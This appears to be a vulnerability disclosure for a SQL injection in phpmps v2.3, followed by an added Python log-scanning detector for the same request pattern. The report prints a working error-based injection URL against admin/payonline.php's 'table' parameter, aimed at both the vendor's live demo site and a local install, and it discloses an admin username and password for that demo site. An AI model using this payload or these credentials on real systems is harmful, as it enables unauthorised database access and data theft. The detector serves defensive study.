### Brief description:
phpmps generic SQL injection (tested successfully on the demo site)

### Details:
Download address for the affected version: http://www.phpmps.com/down/phpmps_v2.3_build140305_utf8.zip

![.jpg](https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg)

http://www.phpmps.com/demo/admin/login.php

Logging in with admin/gxy123123 succeeded:

SQL injection EXP:

```
http://www.phpmps.com/demo/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
```

![payonline injection.jpg](https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg)

### Proof of vulnerability:
The same request also succeeds against a locally built environment:

```
http://localhost/phpmps_v2.3_build140305_utf8/upload/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
```

![.jpg](https://images.seebug.org/upload/201407/10154317af14d03575764f7182435342dd2fb648.jpg)
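A detection check for the request pattern in this report, added here as an example (it is not part of the original report or of phpmps): it scans web access-log lines for requests to `admin/payonline.php` whose `table` parameter is anything other than a bare identifier, or that carry extra path info after the script name. The log format, the sample lines, the table name `pay_log` and the assumption that legitimate `table` values are plain table names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SCRIPT = "/admin/payonline.php"   # script path, taken from the report
PARAM = "table"                   # injectable parameter, taken from the report
# Assumption: a legitimate value is a bare table name (no dots, spaces, quotes).
IDENT = re.compile(r"[A-Za-z0-9_]{1,64}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return the reasons a request target looks like abuse of `table`."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    pos = path.find(SCRIPT)
    if pos < 0:
        return []
    reasons = []
    extra = path[pos + len(SCRIPT):]
    if extra:  # e.g. payonline.php/login.php, as in the report's URL
        reasons.append("path info after script: " + extra)
    # parse_qs percent-decodes values, so %20 and %23 appear as ' ' and '#'.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if not IDENT.fullmatch(value):
            reasons.append("table is not a bare identifier: " + value[:60])
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = check_request(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample lines (combined log format); hosts and times are made up.
PREFIX = '192.0.2.10 - - [10/Jul/2014:15:40:01 +0800] "GET '
SAMPLE_LOG = [
    PREFIX + '/demo/admin/payonline.php?table=pay_log HTTP/1.1" 200 512',
    PREFIX + '/demo/admin/payonline.php/login.php'
             '?table=information_schema.SCHEMATA%20where%201=1%23 HTTP/1.1" 200 733',
    PREFIX + '/demo/admin/payonline.php/login.php?table=pay_log HTTP/1.1" 200 512',
    PREFIX + '/demo/index.php?table=a%20b HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, reasons)
```

The same identifier pattern can serve as an allowlist check in the application itself, since a table name cannot be bound as a prepared-statement parameter.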